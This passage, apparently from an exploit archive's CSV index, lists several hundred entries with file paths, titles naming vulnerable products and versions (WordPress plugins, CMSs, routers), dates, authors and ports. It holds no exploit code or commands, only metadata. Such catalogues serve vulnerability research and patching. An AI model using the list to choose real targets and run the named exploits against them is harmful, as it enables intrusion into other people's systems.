Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps, -37074,exploits/php/webapps/37074.txt,"WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps, -37152,exploits/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80 -37075,exploits/php/webapps/37075.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget-form.php?title' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps, -37076,exploits/php/webapps/37076.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'box_publish_button.php?button_value' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps, -37077,exploits/php/webapps/37077.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'save_successful.php?msg' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps, -37078,exploits/php/webapps/37078.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-11,"High-Tech Bridge SA",php,webapps, -37079,exploits/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injections",2015-05-21,"Filippo Roncari",php,webapps,80 -37080,exploits/php/webapps/37080.txt,"WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 -37082,exploits/php/webapps/37082.txt,"Bioly 1.3 - '/index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps, -37083,exploits/php/webapps/37083.txt,"Joomla! Plugin Beatz 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps, -37084,exploits/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 - Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps, -37085,exploits/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps, -37086,exploits/php/webapps/37086.txt,"WordPress Plugin Yahoo Answer - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps, -37087,exploits/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' HTML Injection",2012-04-17,"Marcos Garcia",php,webapps, -37090,exploits/php/webapps/37090.txt,"Joomla! Component JA T3 Framework - Directory Traversal",2012-04-17,indoushka,php,webapps, -37091,exploits/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'Username' Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps, -37092,exploits/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php?to_userid' Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps, -37093,exploits/php/webapps/37093.txt,"XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-18,"High-Tech Bridge SA",php,webapps, -37094,exploits/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php?redirect_url' Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps, -37095,exploits/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting",2012-04-20,sonyy,php,webapps, -37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps, -37253,exploits/php/webapps/37253.txt,"WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps, -37254,exploits/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 -37255,exploits/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps, -37100,exploits/php/webapps/37100.txt,"Waylu CMS - '/products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps, -37101,exploits/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' SQL Injection",2012-04-23,E1nzte1N,php,webapps, -37102,exploits/php/webapps/37102.txt,"Joomla! Component com_videogallery - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps, -37103,exploits/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps, -37104,exploits/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps, -37105,exploits/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps, -37106,exploits/php/webapps/37106.txt,"WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 -37107,exploits/php/webapps/37107.txt,"WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 -37108,exploits/php/webapps/37108.txt,"WordPress Plugin Landing Pages 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 -37109,exploits/php/webapps/37109.txt,"WordPress Plugin GigPress 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 -37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",java,webapps,8080 -37111,exploits/php/webapps/37111.txt,"WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 -37112,exploits/php/webapps/37112.txt,"WordPress Plugin church_admin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80 -37113,exploits/php/webapps/37113.txt,"WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 -37114,exploits/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 -37115,exploits/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps, -37116,exploits/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps, -37117,exploits/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps, -37118,exploits/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps, -37119,exploits/asp/webapps/37119.txt,"XM Forum - 'id' Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps, -37120,exploits/php/webapps/37120.txt,"Uiga FanClub - 'p' SQL Injection",2012-04-27,"Farbod Mahini",php,webapps, -37121,exploits/asp/webapps/37121.txt,"BBSXP CMS - Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps, -37122,exploits/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' SQL Injection",2012-04-28,eidelweiss,php,webapps, -37123,exploits/php/webapps/37123.txt,"WordPress Plugin WPsc MijnPress - 'rwflush' Cross-Site Scripting",2012-04-30,Am!r,php,webapps, -37125,exploits/php/webapps/37125.txt,"MySQLDumper 1.24.4 - 'restore.php?Filename' Cross-Site Scripting",2012-04-27,AkaStep,php,webapps, -37126,exploits/perl/webapps/37126.txt,"MySQLDumper 1.24.4 - 'install.php?language' Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps, -37127,exploits/php/webapps/37127.txt,"MySQLDumper 1.24.4 - 'install.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-27,AkaStep,php,webapps, -37128,exploits/php/webapps/37128.txt,"MySQLDumper 1.24.4 - 'sql.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-27,AkaStep,php,webapps, -37129,exploits/php/webapps/37129.txt,"MySQLDumper 1.24.4 - 'filemanagement.php?f' Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps, -37130,exploits/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosures",2012-04-27,AkaStep,php,webapps, -37131,exploits/php/webapps/37131.txt,"MySQLDumper 1.24.4 - 'main.php' Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,AkaStep,php,webapps, -37132,exploits/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 -37133,exploits/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php?page' Cross-Site Scripting",2012-04-27,AkaStep,php,webapps, -37134,exploits/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution",2012-04-27,AkaStep,php,webapps, -37135,exploits/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps, -37136,exploits/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps, -37137,exploits/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps, -37138,exploits/php/webapps/37138.txt,"Ramui Forum Script - 'query' Cross-Site Scripting",2012-05-07,3spi0n,php,webapps, -37139,exploits/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Bypass",2012-05-07,L3b-r1'z,php,webapps, -37140,exploits/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps, -37142,exploits/php/webapps/37142.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId' SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps, -37143,exploits/php/webapps/37143.txt,"OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps, -37144,exploits/php/webapps/37144.txt,"OrangeHRM 2.7 RC - '/templates/hrfunct/emppop.php?sortOrder1' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps, -37145,exploits/php/webapps/37145.txt,"OrangeHRM 2.7 RC - 'index.php?URI' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps, -37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps, -37147,exploits/php/webapps/37147.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Cross-Site Scripting",2012-05-10,AkaStep,php,webapps, -37148,exploits/php/webapps/37148.txt,"Chevereto 1.91 - '/Upload/engine.php?v' Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps, -37151,exploits/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 -37154,exploits/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 -37155,exploits/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Cross-Site Scripting",2012-05-13,d3v1l,php,webapps, -37161,exploits/php/webapps/37161.txt,"WordPress Plugin GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37162,exploits/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37166,exploits/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps, -37172,exploits/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps, -37174,exploits/php/webapps/37174.txt,"WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37176,exploits/php/webapps/37176.txt,"WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps, -37177,exploits/php/webapps/37177.txt,"WordPress Plugin CataBlog 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37178,exploits/php/webapps/37178.txt,"WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps, -37179,exploits/php/webapps/37179.txt,"WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37180,exploits/php/webapps/37180.txt,"WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps, -37185,exploits/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token",2015-06-03,"Jeremy Brown",hardware,webapps, -37182,exploits/php/webapps/37182.txt,"WordPress Plugin LeagueManager 3.9.11 - SQL Injection",2015-06-02,javabudd,php,webapps, -37189,exploits/php/webapps/37189.txt,"WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps, -37190,exploits/php/webapps/37190.txt,"WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps, -37191,exploits/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - 'leaflet_layer.php?id' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37192,exploits/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - 'leaflet_marker.php?id' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37193,exploits/php/webapps/37193.txt,"WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37194,exploits/php/webapps/37194.txt,"WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps, -37195,exploits/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - '/fs-admin/fs-admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps, -37196,exploits/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 -37201,exploits/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37202,exploits/php/webapps/37202.txt,"WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37203,exploits/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37204,exploits/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps, -37205,exploits/php/webapps/37205.txt,"LongTail JW Player - 'debug' Cross-Site Scripting",2012-05-16,gainover,php,webapps, -37206,exploits/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - '/demo/PHPThumb.demo.showpic.php?title' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps, -37207,exploits/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - '/demo/PHPThumb.demo.random.php?dir' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps, -37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps, -37209,exploits/php/webapps/37209.txt,"WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion",2015-06-05,Kuroi'SH,php,webapps, -37213,exploits/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps, -37214,exploits/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps, -37252,exploits/php/webapps/37252.txt,"WordPress Plugin RobotCPA V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80 -37216,exploits/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",php,webapps, -37217,exploits/php/webapps/37217.txt,"ArtiPHP 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps, -37219,exploits/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps, -37220,exploits/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps, -37221,exploits/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Security",2012-05-17,anonymous,jsp,webapps, -37222,exploits/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Arbitrary File Upload / Code Executions",2012-05-21,"Aung Khant",asp,webapps, -37223,exploits/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps, -37224,exploits/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,php,webapps, -37225,exploits/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,php,webapps, -37226,exploits/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,php,webapps, -37350,exploits/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php?id' SQL Injection",2012-06-03,KedAns-Dz,php,webapps, -37351,exploits/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,php,webapps, -37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps, -37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps, -37248,exploits/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,php,webapps, -37237,exploits/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps, -37238,exploits/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps, -37240,exploits/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps, -37241,exploits/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps, -37243,exploits/php/webapps/37243.txt,"WordPress Plugin Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 -37244,exploits/php/webapps/37244.txt,"WordPress Plugin WP Mobile Edition - Local File Inclusion",2015-06-08,"Ali Khalil",php,webapps, -37245,exploits/php/webapps/37245.txt,"Pasworld - 'detail.php' Blind SQL Injection",2015-06-08,"Sebastian khan",php,webapps, -37266,exploits/php/webapps/37266.txt,"ClickHeat 1.14 - Cross-Site Request Forgery (Change Admin Password)",2015-06-12,"David Shanahan",php,webapps,80 -37250,exploits/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps, -39479,exploits/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps, -37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80 -37301,exploits/php/webapps/37301.txt,"TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80 -37302,exploits/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps, -37304,exploits/php/webapps/37304.txt,"BlackCat CMS 1.1.1 - Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80 -37305,exploits/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",php,webapps, -37307,exploits/php/webapps/37307.txt,"PHPhq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps, -37308,exploits/php/webapps/37308.txt,"Ruubikcms 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps, -37309,exploits/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' & 1=1--",php,webapps, -37310,exploits/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps, -37311,exploits/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-23,"High-Tech Bridge SA",php,webapps, -37312,exploits/php/webapps/37312.txt,"pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps, -37313,exploits/php/webapps/37313.txt,"pragmaMx 1.12.1 - '/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url' Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps, -37314,exploits/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps, -37315,exploits/php/webapps/37315.txt,"PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' & 1=1--",php,webapps, -37257,exploits/php/webapps/37257.txt,"FiverrScript - Cross-Site Request Forgery (Add Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 -37258,exploits/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure",2015-06-10,"Viktor Minin",hardware,webapps, -37259,exploits/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 -37260,exploits/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080 -37261,exploits/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 -37263,exploits/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 -37264,exploits/php/webapps/37264.txt,"WordPress Plugin Encrypted Contact Form 1.0.4 - Cross-Site Request Forgery",2015-06-10,"Nitin Venkatesh",php,webapps,80 -37270,exploits/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80 -37271,exploits/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 -37272,exploits/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080 -37274,exploits/php/webapps/37274.txt,"WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 -37275,exploits/php/webapps/37275.txt,"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 -37283,exploits/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps, -37316,exploits/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' & 1=1--",php,webapps, -37354,exploits/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps, -37290,exploits/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - '/admin/login.php' Authentication Bypass",2015-06-15,"walid naceri",php,webapps, -37329,exploits/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps, -37330,exploits/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps, -37331,exploits/php/webapps/37331.py,"WHMCompleteSolution (WHMCS) - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps, -37296,exploits/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery",2015-06-16,"Jerold Hoong",php,webapps, -37317,exploits/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps, -37318,exploits/php/webapps/37318.txt,"phpList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps, -37319,exploits/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex HeapSpray",2015-06-19,metacom,windows,webapps, -37320,exploits/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex HeapSpray",2015-06-19,metacom,windows,webapps, -37321,exploits/php/webapps/37321.txt,"DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps, -37322,exploits/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps, -37323,exploits/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete",2015-06-19,Vulnerability-Lab,hardware,webapps, -37325,exploits/multiple/webapps/37325.txt,"Lively Cart - SQL Injection",2015-06-19,"Manish Tanwar",multiple,webapps, -37328,exploits/php/webapps/37328.php,"Small-Cms - 'hostname' Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps, -37355,exploits/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps, -37356,exploits/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps, -37357,exploits/php/webapps/37357.php,"WordPress Plugin VideoWhisper Video Presentation 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps, -37337,exploits/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Cross-Site Request Forgery (Multiple Application Function)",2012-05-31,"Shadman Tanjim",php,webapps, -37338,exploits/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 - 'KnowledgeBase.php?search' Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps, -37339,exploits/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps, -37340,exploits/php/webapps/37340.html,"TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps, -37341,exploits/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php?page' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps, -37342,exploits/php/webapps/37342.txt,"TinyCMS 1.3 - '/admin/admin.php?do' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps, -37816,exploits/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps, -37815,exploits/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80 -39249,exploits/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection 